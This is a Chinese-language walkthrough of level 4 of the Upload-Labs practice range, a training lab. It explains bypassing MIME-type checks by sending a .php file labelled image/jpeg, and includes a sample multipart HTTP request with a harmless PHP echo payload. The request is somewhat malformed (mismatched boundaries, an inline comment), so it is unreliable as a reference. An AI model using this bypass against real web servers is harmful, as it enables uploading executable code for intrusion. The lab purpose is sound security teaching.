upload-labs靶场4关

### Upload-Labs 靶场第4关分析

Upload-Labs 是一个用于学习和实践文件上传漏洞的安全测试平台。第四关主要涉及通过绕过服务器端的 MIME 类型验证来实现任意文件上传。

#### 关键点解析

服务器通常会检查上传文件的内容类型（MIME type），以防止恶意文件被上传到服务器上。然而，在某些情况下，这种检查可以被绕过。具体来说，如果仅依赖于客户端提供的 `Content-Type` 头部信息来进行校验，则攻击者可以通过修改请求中的该头部字段来欺骗服务器[^1]。

为了成功完成此挑战，需要构造一个特制的 HTTP 请求，其中包含错误但合法形式的数据，使得尽管实际提交的是 PHP 文件或其他可执行脚本，但在传输过程中伪装成无害类型的图像文件等其他不可执行资源。当目标应用接收到这个伪造了 Content-Type 的 POST 请求并保存所附带的 payload 后，便可能允许其作为预期外的形式被执行或处理。

#### 实现方法

一种常见的技巧是在构建 multipart/form-data 编码格式的表单数据时指定不匹配扩展名的实际内容类型：

POST /upload.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 297
Cache-Control: max-age=0
Origin: http://localhost
Content-Type: multipart/form-data; boundary=--17628812111320202415242022211
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpeg    // 这里故意设置为image/jpeg而非application/x-php

<?php echo 'Hello'; ?>
-------------------------------17628812111320202415242022211--

上述例子展示了如何发送带有 `.php` 扩展名却声明自己是 JPEG 图片 (`image/jpeg`) 的文件给服务器。由于许多应用程序只基于文件头而不是真实内容来做判断，因此这样的尝试有时能够奏效。